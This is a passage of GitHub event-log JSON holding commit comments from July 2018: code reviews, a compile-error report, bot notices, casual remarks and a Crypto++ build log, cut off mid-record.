{"id":"7902715585","type":"CommitCommentEvent","actor":{"login":"Parovozik"},"repo":{"name":"xenia-project/xenia"},"payload":{"comment":{"id":29557197,"position":null,"line":null,"path":null,"commit_id":"94d1106386e571bd371c0cdcb893336f66d364ae","created_at":"2018-07-01T09:14:07Z","updated_at":"2018-07-01T09:14:07Z","author_association":"NONE","body":" :yum: \r\n![bomberman](https://user-images.githubusercontent.com/19775644/42132829-3000b198-7d28-11e8-8c13-c5677ad2782d.jpg) \r\n"}},"created_at":"2018-07-01T09:14:07Z"}
{"id":"7902716270","type":"CommitCommentEvent","actor":{"login":"BGftw97"},"repo":{"name":"BGftw97/hello-world"},"payload":{"comment":{"id":29557200,"position":null,"line":null,"path":null,"commit_id":"aca23b3df53c38229b84552a2ece7c4174644176","created_at":"2018-07-01T09:14:38Z","updated_at":"2018-07-01T09:14:38Z","author_association":"OWNER","body":"purvata e mnoo dobre samo4e vtorata nikva ideq i az otkade daje da zapo4na\r\nvish sq sha ima part dve ot testa ma tam zada4ite mai sha sa po kofti\r\n\r\n"}},"created_at":"2018-07-01T09:14:38Z"}
{"id":"7902716868","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"YachnikAlexander/Training-Summer-Express-2018-C-"},"payload":{"comment":{"id":29557204,"position":38,"line":19,"path":"NET.S.2018.YACHNIK.01/ArraySorting/ArraySorting/Sort.cs","commit_id":"08633400149e8a91d78ef750b5511c5ff9d07ab4","created_at":"2018-07-01T09:15:08Z","updated_at":"2018-07-01T09:15:08Z","author_association":"NONE","body":"IsValid - плохое имя, поскольку он не булевский"}},"created_at":"2018-07-01T09:15:08Z"}
{"id":"7902719570","type":"CommitCommentEvent","actor":{"login":"dineshparameswaran1998"},"repo":{"name":"ashokmuruga/Web-Programming"},"payload":{"comment":{"id":29557210,"position":null,"line":null,"path":null,"commit_id":"9996c6dc8db9101e3c627224f8f6426ea99b6b42","created_at":"2018-07-01T09:17:13Z","updated_at":"2018-07-01T09:17:13Z","author_association":"NONE","body":"sample"}},"created_at":"2018-07-01T09:17:13Z"}
{"id":"7902719919","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/oommfc-feedstock"},"payload":{"comment":{"id":29557212,"position":null,"line":null,"path":null,"commit_id":"d0775144026eb291760adb956eca0b24a3b6f355","created_at":"2018-07-01T09:17:31Z","updated_at":"2018-07-01T09:17:31Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @davidcortesortuno were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @davidcortesortuno were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-01T09:17:31Z"}
{"id":"7902723870","type":"CommitCommentEvent","actor":{"login":"Triang3l"},"repo":{"name":"xenia-project/xenia"},"payload":{"comment":{"id":29557219,"position":null,"line":null,"path":null,"commit_id":"94d1106386e571bd371c0cdcb893336f66d364ae","created_at":"2018-07-01T09:20:52Z","updated_at":"2018-07-01T09:20:52Z","author_association":"CONTRIBUTOR","body":"Still some shadow acne there — random grey dots here and there. Will check what values it sends some time later."}},"created_at":"2018-07-01T09:20:52Z"}
{"id":"7902724034","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"IlyaDvortsevoy/NET.S.2018.Dvortsevoy.02"},"payload":{"comment":{"id":29557220,"position":102,"line":124,"path":"Algorithms/Algorithm.cs","commit_id":"e64c80c4b2d4f891a6c5068831f9611bca291f8e","created_at":"2018-07-01T09:21:00Z","updated_at":"2018-07-01T09:21:00Z","author_association":"NONE","body":"Для того, чтобы проверить, что digit - целое число в диапазоне от 0 до 9, нужно использовать тяжеловесный аппарат регулярных выражений?"}},"created_at":"2018-07-01T09:21:00Z"}
{"id":"7902724736","type":"CommitCommentEvent","actor":{"login":"WarrenLobo"},"repo":{"name":"Yasir-siddiqui/Joker_dabot"},"payload":{"comment":{"id":29557221,"position":null,"line":null,"path":null,"commit_id":"9ead4f6659e080e2b7c70bf1657681bf6eb723dd","created_at":"2018-07-01T09:21:33Z","updated_at":"2018-07-01T09:21:33Z","author_association":"COLLABORATOR","body":"lol"}},"created_at":"2018-07-01T09:21:33Z"}
{"id":"7902725086","type":"CommitCommentEvent","actor":{"login":"Botanistt"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29557222,"position":null,"line":null,"path":null,"commit_id":"0ff8efab714a837f3c037e13c150f203fb50cce7","created_at":"2018-07-01T09:21:54Z","updated_at":"2018-07-01T09:21:54Z","author_association":"NONE","body":"@protox game giveaway?"}},"created_at":"2018-07-01T09:21:54Z"}
{"id":"7902733042","type":"CommitCommentEvent","actor":{"login":"nikomatsakis"},"repo":{"name":"spastorino/rust"},"payload":{"comment":{"id":29557241,"position":5,"line":161,"path":"src/librustc_mir/util/liveness.rs","commit_id":"986bb2a81ee58a35b5deb729fb8f1cdf53b774d3","created_at":"2018-07-01T09:28:27Z","updated_at":"2018-07-01T09:28:27Z","author_association":"COLLABORATOR","body":"buffer would be of type `LocalSet`"}},"created_at":"2018-07-01T09:28:27Z"}
{"id":"7902733984","type":"CommitCommentEvent","actor":{"login":"nikomatsakis"},"repo":{"name":"spastorino/rust"},"payload":{"comment":{"id":29557242,"position":3,"line":160,"path":"src/librustc_mir/util/liveness.rs","commit_id":"986bb2a81ee58a35b5deb729fb8f1cdf53b774d3","created_at":"2018-07-01T09:29:18Z","updated_at":"2018-07-01T09:29:18Z","author_association":"COLLABORATOR","body":"I would add a method to `LivenessResult` like\r\n\r\n```rust\r\nfn make_simulate_buffer(&self, mir: &Mir<'tcx>) -> LocalSet {\r\n    LocalSet::new_empty(locals);\r\n}\r\n```"}},"created_at":"2018-07-01T09:29:18Z"}
{"id":"7902735711","type":"CommitCommentEvent","actor":{"login":"nikomatsakis"},"repo":{"name":"spastorino/rust"},"payload":{"comment":{"id":29557247,"position":14,"line":87,"path":"src/librustc_mir/borrow_check/nll/type_check/liveness.rs","commit_id":"986bb2a81ee58a35b5deb729fb8f1cdf53b774d3","created_at":"2018-07-01T09:30:41Z","updated_at":"2018-07-01T09:30:41Z","author_association":"COLLABORATOR","body":"you don't need a separate regular/drops buffer -- the buffer is just a bitset of local variables, and the set of local variables comes from the MIR, it is the same for the regular/drop computation. If we add the helper I suggested below, this would be something like:\r\n\r\n```rust\r\nlet mut simulate_buffer = self.liveness.make_simulate_buffer(self.mir);\r\n```"}},"created_at":"2018-07-01T09:30:41Z"}
{"id":"7902736521","type":"CommitCommentEvent","actor":{"login":"nikomatsakis"},"repo":{"name":"spastorino/rust"},"payload":{"comment":{"id":29557248,"position":14,"line":87,"path":"src/librustc_mir/borrow_check/nll/type_check/liveness.rs","commit_id":"986bb2a81ee58a35b5deb729fb8f1cdf53b774d3","created_at":"2018-07-01T09:31:23Z","updated_at":"2018-07-01T09:31:23Z","author_association":"COLLABORATOR","body":"but also, this is at the wrong place. This call should be in the caller — i.e., [the `generate` function that is earlier in this file](https://doc.rust-lang.org/nightly/nightly-rustc/rustc_mir/borrow_check/nll/type_check/liveness/fn.generate.html)"}},"created_at":"2018-07-01T09:31:23Z"}
{"id":"7902736742","type":"CommitCommentEvent","actor":{"login":"nikomatsakis"},"repo":{"name":"spastorino/rust"},"payload":{"comment":{"id":29557249,"position":14,"line":87,"path":"src/librustc_mir/borrow_check/nll/type_check/liveness.rs","commit_id":"986bb2a81ee58a35b5deb729fb8f1cdf53b774d3","created_at":"2018-07-01T09:31:36Z","updated_at":"2018-07-01T09:31:36Z","author_association":"COLLABORATOR","body":"that way it is shared across all basic blocks"}},"created_at":"2018-07-01T09:31:36Z"}
{"id":"7902737025","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Zhikh/NET.S.2018.Zhikh.02"},"payload":{"comment":{"id":29557251,"position":null,"line":null,"path":null,"commit_id":"aba2b3e4bcdc2c8e975ac43c4cdce65802a52392","created_at":"2018-07-01T09:31:51Z","updated_at":"2018-07-01T09:31:51Z","author_association":"NONE","body":"Не уверена, что здесь стоило выделять столько вспомогательных функций, это функциональность одной функции, дергающей битовые операции"}},"created_at":"2018-07-01T09:31:51Z"}
{"id":"7902739612","type":"CommitCommentEvent","actor":{"login":"nikomatsakis"},"repo":{"name":"spastorino/rust"},"payload":{"comment":{"id":29557257,"position":13,"line":168,"path":"src/librustc_mir/util/liveness.rs","commit_id":"986bb2a81ee58a35b5deb729fb8f1cdf53b774d3","created_at":"2018-07-01T09:34:16Z","updated_at":"2018-07-01T09:34:16Z","author_association":"COLLABORATOR","body":"`bits` would just be replaced with `buffer` -- i.e., `let bits = buffer`"}},"created_at":"2018-07-01T09:34:16Z"}
{"id":"7902739869","type":"CommitCommentEvent","actor":{"login":"ronnix"},"repo":{"name":"betagouv/zam"},"payload":{"comment":{"id":29557259,"position":67,"line":624,"path":"repondeur/zam_repondeur/templates/visionneuse.html","commit_id":"50a51d12a55474e632453a02df6ff20c3ff73beb","created_at":"2018-07-01T09:34:31Z","updated_at":"2018-07-01T09:34:31Z","author_association":"COLLABORATOR","body":"No it works, the empty href is correct (looks like even the = could be omitted), but I found the syntax a bit confusing. Not sure how to make it more obvious that this is a relative link to the current page... "}},"created_at":"2018-07-01T09:34:31Z"}
{"id":"7902740805","type":"CommitCommentEvent","actor":{"login":"fitzchak"},"repo":{"name":"ml054/ravendb"},"payload":{"comment":{"id":29557260,"position":6,"line":77,"path":"src/Raven.Server/Web/System/SetupHandler.cs","commit_id":"b5ab392197724ec18ed36a6c468946b348564af6","created_at":"2018-07-01T09:35:19Z","updated_at":"2018-07-01T09:35:19Z","author_association":"COLLABORATOR","body":"When result could be null?\r\nIsn't this case is an error?"}},"created_at":"2018-07-01T09:35:19Z"}
{"id":"7902740869","type":"CommitCommentEvent","actor":{"login":"Annastaciahubbard"},"repo":{"name":"Annastaciahubbard/saturdayitis"},"payload":{"comment":{"id":29557261,"position":null,"line":null,"path":null,"commit_id":"b8a18367ecf9884cf628fd523792c3d705feb7ab","created_at":"2018-07-01T09:35:22Z","updated_at":"2018-07-01T09:35:22Z","author_association":"OWNER","body":"GitHub adding pyspark \r\n\r\nPython "}},"created_at":"2018-07-01T09:35:22Z"}
{"id":"7902741071","type":"CommitCommentEvent","actor":{"login":"nikomatsakis"},"repo":{"name":"spastorino/rust"},"payload":{"comment":{"id":29557263,"position":13,"line":168,"path":"src/librustc_mir/util/liveness.rs","commit_id":"986bb2a81ee58a35b5deb729fb8f1cdf53b774d3","created_at":"2018-07-01T09:35:31Z","updated_at":"2018-07-01T09:35:31Z","author_association":"COLLABORATOR","body":"er wait but we *do* need to do this:\r\n\r\n```rust\r\nbuffer.overwrite(&self.outs[block]);\r\n```\r\n\r\nto initialize the buffer with the right thing"}},"created_at":"2018-07-01T09:35:31Z"}
{"id":"7902741684","type":"CommitCommentEvent","actor":{"login":"BEERJOBES"},"repo":{"name":"atom/atom-dark-ui"},"payload":{"comment":{"id":29557268,"position":null,"line":null,"path":null,"commit_id":"9117e70b4b0581db8028489f88d9ff9ba70e61cf","created_at":"2018-07-01T09:36:05Z","updated_at":"2018-07-01T09:36:05Z","author_association":"NONE","body":"[](url)"}},"created_at":"2018-07-01T09:36:05Z"}
{"id":"7902741975","type":"CommitCommentEvent","actor":{"login":"Sanjanawinchester"},"repo":{"name":"sparkfun/SparkFun_MPU-9250_Breakout_Arduino_Library"},"payload":{"comment":{"id":29557269,"position":null,"line":null,"path":null,"commit_id":"113e836e989699913660c60bacda12da4a919c91","created_at":"2018-07-01T09:36:19Z","updated_at":"2018-07-01T09:36:19Z","author_association":"NONE","body":"Hey...nice modification. But when I compiled the MPU9250 code for I2C, I am getting following error:\r\nArduino: 1.8.5 (Windows 10), Board: \"Arduino Nano, ATmega328P (Old Bootloader)\"\r\n\r\nC:\\Program Files\\Arduino\\libraries\\SparkFun_MPU-9250_Breakout_Arduino_Library-master\\src\\MPU9250.cpp: In member function 'void MPU9250::magCalMPU9250(float*, float*)':\r\n\r\nC:\\Program Files\\Arduino\\libraries\\SparkFun_MPU-9250_Breakout_Arduino_Library-master\\src\\MPU9250.cpp:281:4: error: 'MPU9250Mmode' was not declared in this scope\r\n\r\n if(MPU9250Mmode == 0x02) sample_count = 128;  // at 8 Hz ODR, new mag data is available every 125 ms\r\n\r\n    ^\r\n\r\nC:\\Program Files\\Arduino\\libraries\\SparkFun_MPU-9250_Breakout_Arduino_Library-master\\src\\MPU9250.cpp:282:4: error: 'MPU9250Mmode' was not declared in this scope\r\n\r\n if(MPU9250Mmode == 0x06) sample_count = 1500;  // at 100 Hz ODR, new mag data is available every 10 ms\r\n\r\n    ^\r\n\r\nC:\\Program Files\\Arduino\\libraries\\SparkFun_MPU-9250_Breakout_Arduino_Library-master\\src\\MPU9250.cpp:284:28: error: 'MPU9250readMagData' was not declared in this scope\r\n\r\n MPU9250readMagData(mag_temp);  // Read the mag data   \r\n\r\n                            ^\r\n\r\nC:\\Program Files\\Arduino\\libraries\\SparkFun_MPU-9250_Breakout_Arduino_Library-master\\src\\MPU9250.cpp:289:4: error: 'MPU9250Mmode' was not declared in this scope\r\n\r\n if(MPU9250Mmode == 0x02) delay(135);  // at 8 Hz ODR, new mag data is available every 125 ms\r\n\r\n    ^\r\n\r\nC:\\Program Files\\Arduino\\libraries\\SparkFun_MPU-9250_Breakout_Arduino_Library-master\\src\\MPU9250.cpp:290:4: error: 'MPU9250Mmode' was not declared in this scope\r\n\r\n if(MPU9250Mmode == 0x06) delay(12);  // at 100 Hz ODR, new mag data is available every 10 ms\r\n\r\n    ^\r\n\r\nC:\\Program Files\\Arduino\\libraries\\SparkFun_MPU-9250_Breakout_Arduino_Library-master\\src\\MPU9250.cpp:299:33: error: 'MPU9250mRes' was not declared in this scope\r\n\r\n  dest1[0] = (float) mag_bias[0]*MPU9250mRes*MPU9250magCalibration[0];  // save mag biases in G for main program\r\n\r\n                                 ^\r\n\r\nC:\\Program Files\\Arduino\\libraries\\SparkFun_MPU-9250_Breakout_Arduino_Library-master\\src\\MPU9250.cpp:299:45: error: 'MPU9250magCalibration' was not declared in this scope\r\n\r\n  dest1[0] = (float) mag_bias[0]*MPU9250mRes*MPU9250magCalibration[0];  // save mag biases in G for main program\r\n\r\n                                             ^\r\n\r\nC:\\Program Files\\Arduino\\libraries\\SparkFun_MPU-9250_Breakout_Arduino_Library-master\\src\\MPU9250.cpp: At global scope:\r\n\r\nC:\\Program Files\\Arduino\\libraries\\SparkFun_MPU-9250_Breakout_Arduino_Library-master\\src\\MPU9250.cpp:651:6: error: redefinition of 'void MPU9250::magCalMPU9250(float*, float*)'\r\n\r\n void MPU9250::magCalMPU9250(float * bias_dest, float * scale_dest)\r\n\r\n      ^\r\n\r\nC:\\Program Files\\Arduino\\libraries\\SparkFun_MPU-9250_Breakout_Arduino_Library-master\\src\\MPU9250.cpp:271:6: note: 'void MPU9250::magCalMPU9250(float*, float*)' previously defined here\r\n\r\n void MPU9250::magCalMPU9250(float * dest1, float * dest2) \r\n\r\n      ^\r\n\r\nC:\\Program Files\\Arduino\\libraries\\SparkFun_MPU-9250_Breakout_Arduino_Library-master\\src\\MPU9250.cpp: In member function 'uint8_t MPU9250::writeByteWire(uint8_t, uint8_t, uint8_t)':\r\n\r\nC:\\Program Files\\Arduino\\libraries\\SparkFun_MPU-9250_Breakout_Arduino_Library-master\\src\\MPU9250.cpp:782:10: warning: converting to non-pointer type 'uint8_t {aka unsigned char}' from NULL [-Wconversion-null]\r\n\r\n   return NULL;\r\n\r\n          ^\r\n\r\nexit status 1\r\nError compiling for board Arduino Nano.\r\nInvalid library found in C:\\Program Files\\Arduino\\libraries\\arduino-i2c-scanner-master: C:\\Program Files\\Arduino\\libraries\\arduino-i2c-scanner-master\r\nInvalid library found in C:\\Program Files\\Arduino\\libraries\\MPU9250-master: C:\\Program Files\\Arduino\\libraries\\MPU9250-master\r\nInvalid library found in C:\\Program Files\\Arduino\\libraries\\toxiclibs-complete-0020: C:\\Program Files\\Arduino\\libraries\\toxiclibs-complete-0020\r\nInvalid library found in C:\\Users\\Dell\\Documents\\Arduino\\libraries\\Arduino-Libs-master: C:\\Users\\Dell\\Documents\\Arduino\\libraries\\Arduino-Libs-master\r\nInvalid library found in C:\\Users\\Dell\\Documents\\Arduino\\libraries\\Prog: C:\\Users\\Dell\\Documents\\Arduino\\libraries\\Prog\r\nInvalid library found in C:\\Program Files\\Arduino\\libraries\\arduino-i2c-scanner-master: C:\\Program Files\\Arduino\\libraries\\arduino-i2c-scanner-master\r\nInvalid library found in C:\\Program Files\\Arduino\\libraries\\MPU9250-master: C:\\Program Files\\Arduino\\libraries\\MPU9250-master\r\nInvalid library found in C:\\Program Files\\Arduino\\libraries\\toxiclibs-complete-0020: C:\\Program Files\\Arduino\\libraries\\toxiclibs-complete-0020\r\nInvalid library found in C:\\Users\\Dell\\Documents\\Arduino\\libraries\\Arduino-Libs-master: C:\\Users\\Dell\\Documents\\Arduino\\libraries\\Arduino-Libs-master\r\nInvalid library found in C:\\Users\\Dell\\Documents\\Arduino\\libraries\\Prog: C:\\Users\\Dell\\Documents\\Arduino\\libraries\\Prog\r\n\r\nThis report would have more information with\r\n\"Show verbose output during compilation\"\r\noption enabled in File -> Preferences.\r\n\r\n\r\n\r\nplease help!!!"}},"created_at":"2018-07-01T09:36:19Z"}
{"id":"7902742197","type":"CommitCommentEvent","actor":{"login":"mycs"},"repo":{"name":"jlord/patchwork"},"payload":{"comment":{"id":29557270,"position":null,"line":null,"path":null,"commit_id":"47490c3767bddc0d014874556b0b59f70c73ec45","created_at":"2018-07-01T09:36:30Z","updated_at":"2018-07-01T09:36:30Z","author_association":"CONTRIBUTOR","body":"+mycs"}},"created_at":"2018-07-01T09:36:30Z"}
{"id":"7902742516","type":"CommitCommentEvent","actor":{"login":"mirraaj"},"repo":{"name":"Kaixhin/ACER"},"payload":{"comment":{"id":29557271,"position":null,"line":null,"path":null,"commit_id":"4326295297ad7c4c7accf6ffaae707432d4c6f0e","created_at":"2018-07-01T09:36:45Z","updated_at":"2018-07-01T09:36:45Z","author_association":"CONTRIBUTOR","body":"By the results, it is clear that trust region is required for good results. However, there is a huge variance in the learning process. It is clear that with the (-kl) implementation, learning seems to converge at around 130-150. With the (+kl) as I have suggested, there is significant learning at 400k+ steps.\r\n\r\nCould you please let me know about the difference in the implementation of KL divergence in your repository with OpenAI baselines."}},"created_at":"2018-07-01T09:36:45Z"}
{"id":"7902742933","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29557272,"position":null,"line":null,"path":null,"commit_id":"ba0b5c2abf634e1dbcf9feb343b8466de298f91b","created_at":"2018-07-01T09:37:07Z","updated_at":"2018-07-01T09:37:07Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-215](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-215).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-215-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-01T09:37:07Z"}
{"id":"7902743331","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Zhikh/NET.S.2018.Zhikh.02"},"payload":{"comment":{"id":29557273,"position":19,"line":31,"path":"NET.S.2018.Zhikh.02/Logic.Task2/DigitWorker.cs","commit_id":"30d420aa4e1762d9d9feabe9cb4723d4a4332f8b","created_at":"2018-07-01T09:37:28Z","updated_at":"2018-07-01T09:37:28Z","author_association":"NONE","body":"Зачем осталась checkString в коде? И мне нужно, чтобы у Вас было две реализации фильтра - через строки и через выделение цифр числа делением, для сравнения их производительности на больших данных. И еще - рекурсия нужна только там, где итерационная реализация не очень наглядна, я бы не стала здесь использовать рекурсивную реализацию."}},"created_at":"2018-07-01T09:37:28Z"}
{"id":"7902744951","type":"CommitCommentEvent","actor":{"login":"alphapapa"},"repo":{"name":"thblt/magit"},"payload":{"comment":{"id":29557275,"position":133,"line":137,"path":"lisp/magit-pgp.el","commit_id":"7f32739063e51488b42794629013ea67742f1bad","created_at":"2018-07-01T09:38:59Z","updated_at":"2018-07-01T09:38:59Z","author_association":"NONE","body":"Would it be better (i.e. faster) to have `--parse-output` read the buffer directly one line at a time rather than building and passing it a list of lines? Isn't that more idiomatic Emacs? :)"}},"created_at":"2018-07-01T09:38:59Z"}
{"id":"7902745020","type":"CommitCommentEvent","actor":{"login":"whyang0808"},"repo":{"name":"whyang0808/learning-react"},"payload":{"comment":{"id":29557276,"position":7,"line":19,"path":"react-complete-guide/src/App.js","commit_id":"4037d2950a5431c51f7309e33ab9f5451a671c75","created_at":"2018-07-01T09:39:02Z","updated_at":"2018-07-01T09:39:02Z","author_association":"OWNER","body":"Wrongly set, the ids should be set at the state above."}},"created_at":"2018-07-01T09:39:02Z"}
{"id":"7902750031","type":"CommitCommentEvent","actor":{"login":"KRITHIKARAVICHANDRAN"},"repo":{"name":"KRITHIKARAVICHANDRAN/TOWARDS-DREAMS"},"payload":{"comment":{"id":29557285,"position":null,"line":null,"path":null,"commit_id":"9334e8b15ec611de6ef9b827c42a8d386c026811","created_at":"2018-07-01T09:43:05Z","updated_at":"2018-07-01T09:43:05Z","author_association":"OWNER","body":"HI"}},"created_at":"2018-07-01T09:43:05Z"}
{"id":"7902750993","type":"CommitCommentEvent","actor":{"login":"davidbgk"},"repo":{"name":"betagouv/zam"},"payload":{"comment":{"id":29557289,"position":19,"line":39,"path":"repondeur/zam_repondeur/views/reponse.py","commit_id":"50a51d12a55474e632453a02df6ff20c3ff73beb","created_at":"2018-07-01T09:44:00Z","updated_at":"2018-07-01T09:44:00Z","author_association":"MEMBER","body":"The issue is to generate a timezone-less timestamp, which is not the case of the default `.timestamp()` and doesn't look to be the case of your proposal either. It may be possible to come up with a solution explicitly resetting the timezone but I find that comparing to 1970 is more explicit in that case. Thoughts?"}},"created_at":"2018-07-01T09:44:00Z"}
{"id":"7902751321","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"andrej2012/NET.S.2018.Kozlovski.02"},"payload":{"comment":{"id":29557290,"position":11,"line":11,"path":"FirstTask/NumberClass.cs","commit_id":"862e9dc5e175d9d4eea1c00a0ead7e8e1c8191e2","created_at":"2018-07-01T09:44:16Z","updated_at":"2018-07-01T09:44:16Z","author_association":"NONE","body":"XML-комментарии  не достаточны, нет описания параметров и исключений"}},"created_at":"2018-07-01T09:44:16Z"}
{"id":"7902751377","type":"CommitCommentEvent","actor":{"login":"drsm"},"repo":{"name":"nginx/njs"},"payload":{"comment":{"id":29557291,"position":null,"line":null,"path":null,"commit_id":"7cacebeb562e5156987c35ca34a473f4fadd869a","created_at":"2018-07-01T09:44:18Z","updated_at":"2018-07-01T09:44:18Z","author_association":"NONE","body":"not yet results, but of cause, #25 #26 )"}},"created_at":"2018-07-01T09:44:18Z"}
{"id":"7902752648","type":"CommitCommentEvent","actor":{"login":"KellerNET"},"repo":{"name":"jlazkano/Logotipos-TV"},"payload":{"comment":{"id":29557292,"position":null,"line":null,"path":null,"commit_id":"6dc3200c5ac6c1eb803168e656d6a1e49624ffb4","created_at":"2018-07-01T09:44:51Z","updated_at":"2018-07-01T09:44:51Z","author_association":"NONE","body":"Hola Jesús.\r\nTodos te agradecemos tus aportes, te comento, los logos estamos intentando que tengan la misma relación de aspecto, 1-1 (Cuadrado) y el mismo tamaño 384x384 pixels con fondo transparente, para utilizarlos en distintas plataformas, 384píxels es mas que suficiente para ver el logo en miniatura y en un tamaño grande en resoluciones 1080p y 2k, en 4k se quedará pequeño, pero en 4k y 2k no es necesario ya que la TV solo se ve en 4k Rescalado, no es real por que el ancho de banda necesario no está soportado ni vía Satélite ni vía cable ya que en este país dependemos de la velocidad de Internet asignada para la TV vía cable, a parte que las cadenas de TV tendrían que adaptar sus equipos y emitir en 4k nativo, así que a corto, medio plazo no es necesario el 4k en DVB-T, DVB-C ni en TVB-S.\r\n"}},"created_at":"2018-07-01T09:44:51Z"}
{"id":"7902752789","type":"CommitCommentEvent","actor":{"login":"whyang0808"},"repo":{"name":"whyang0808/learning-react"},"payload":{"comment":{"id":29557293,"position":7,"line":8,"path":"react-complete-guide/src/App.js","commit_id":"71892b2dd9692b72bf05de6f4059be628c450c9e","created_at":"2018-07-01T09:44:59Z","updated_at":"2018-07-01T09:44:59Z","author_association":"OWNER","body":"Fix the previous unique key issue."}},"created_at":"2018-07-01T09:44:59Z"}
{"id":"7902753384","type":"CommitCommentEvent","actor":{"login":"whyang0808"},"repo":{"name":"whyang0808/learning-react"},"payload":{"comment":{"id":29557297,"position":25,"line":25,"path":"react-complete-guide/src/App.js","commit_id":"71892b2dd9692b72bf05de6f4059be628c450c9e","created_at":"2018-07-01T09:45:29Z","updated_at":"2018-07-01T09:45:29Z","author_association":"OWNER","body":"Old way to do this\r\n"}},"created_at":"2018-07-01T09:45:29Z"}
{"id":"7902754244","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"kconrado/kkowalski_2nd_repository"},"payload":{"comment":{"id":29557298,"position":29,"line":36,"path":"src/main/java/com/crud/tasks/controller/TrelloController.java","commit_id":"eb3da4cdaf8dc61e016ec4355110d0a9b93d31a1","created_at":"2018-07-01T09:46:13Z","updated_at":"2018-07-01T09:46:13Z","author_association":"NONE","body":"Drugi stream nie jest potrzebny, ten wyżej wystarczy"}},"created_at":"2018-07-01T09:46:13Z"}
{"id":"7902755334","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"kconrado/kkowalski_2nd_repository"},"payload":{"comment":{"id":29557299,"position":18,"line":25,"path":"src/main/java/com/crud/tasks/controller/TrelloController.java","commit_id":"eb3da4cdaf8dc61e016ec4355110d0a9b93d31a1","created_at":"2018-07-01T09:47:06Z","updated_at":"2018-07-01T09:47:06Z","author_association":"NONE","body":"Najpierw powinno by sprawdzenie (filtrowanie) czy id i name są różne od nulla. Jeśli np id będzie nullem i wywołać id.isEmpty() zostanie wyświetlony NullPointerException"}},"created_at":"2018-07-01T09:47:06Z"}
{"id":"7902756010","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"noloader/cryptopp-autotools"},"payload":{"comment":{"id":29557301,"position":null,"line":null,"path":null,"commit_id":"80ca067988702244a8bc4279312d9a3f30d0ec5b","created_at":"2018-07-01T09:47:39Z","updated_at":"2018-07-01T09:47:39Z","author_association":"OWNER","body":"@gcsideal,\r\n\r\nI'm having trouble getting SIMECK added to the Autotools files. SIMECK's `CXXFLAGS` are set:\r\n\r\n```\r\n...\r\nAuto-configuration complete. A summary of options are below. If\r\nsomething looks wrong then please modify config.h and please report\r\nit at http://github.com/noloader/cryptopp-autotools.\r\n\r\n   Build triplet: x86_64-pc-linux-gnu\r\n Compiler target: x86_64-redhat-linux\r\nCompiler version: g++ (GCC) 8.1.1 20180502 (Red Hat 8.1.1-1)\r\n\r\nStatic library: yes\r\nShared library: yes\r\n\r\nCRYPTOPP_SSE_FLAG: -msse2\r\nCRYPTOPP_ARIA_FLAG: -mssse3\r\nCRYPTOPP_BLAKE2_FLAG: -msse4.1\r\nCRYPTOPP_CHAM_FLAG: -mssse3\r\nCRYPTOPP_CRC_FLAG: -msse4.2\r\nCRYPTOPP_LEA_FLAG: -mssse3\r\nCRYPTOPP_GCM_FLAG: -mssse3 -mpclmul\r\nCRYPTOPP_AES_FLAG: -msse4.1 -maes\r\nCRYPTOPP_SHA_FLAG: -msse4.2 -msha\r\nCRYPTOPP_SIMECK_FLAG: -mssse3\r\nCRYPTOPP_SIMON_FLAG: -msse4.1\r\nCRYPTOPP_SPECK_FLAG: -msse4.1\r\n\r\nAutomake flags (can be overridden by user flags):\r\nAM_CXXFLAGS:  -pthread -fdata-sections -ffunction-sections -pipe\r\nAM_LDFLAGS:  -pthread -Wl,--gc-sections -Wl,--exclude-libs,ALL -Wl,--as-needed\r\n\r\nUser flags (overrides Automake flags on conflict):\r\nCXXFLAGS: -g -O2\r\nLDFLAGS:\r\n\r\nCPPFLAGS does not include -DNDEBUG. You should consider building\r\nwith NDEBUG defined so an assert does not inadvertently crash your\r\nprogram and egress sensitive data to an error reporting service\r\nlike AppPort, Windows Error Reporting, Crash Reporter, etc.\r\n\r\nCXXFLAGS does not include -O3. You should consider building at -O3\r\nto engage compiler vectorizations and enhance performance.\r\n\r\nThe machine is 64-bit capable but -m64 is not present in CXXFLAGS\r\n```\r\n\r\nBut when `simeck-simd.cpp` is compiled, it happens without `-mssse3` so the compile fails:\r\n\r\n```\r\n/bin/sh ./libtool  --tag=CXX   --mode=compile g++ -DHAVE_CONFIG_H -I.    -pthread -fdata-sections -ffunction-sections -pipe -g -O2 -MT simeck-simd.lo -MD -MP -MF .deps/simeck-simd.Tpo -c -o simeck-simd.lo simeck-simd.cpp\r\nlibtool: compile:  g++ -DHAVE_CONFIG_H -I. -pthread -fdata-sections -ffunction-sections -pipe -g -O2 -MT simeck-simd.lo -MD -MP -MF .deps/simeck-simd.Tpo -c simeck-simd.cpp  -fPIC -DPIC -o .libs/simeck-simd.o\r\nIn file included from /usr/lib/gcc/x86_64-redhat-linux/8/include/immintrin.h:35,\r\n                 from adv-simd.h:47,\r\n                 from 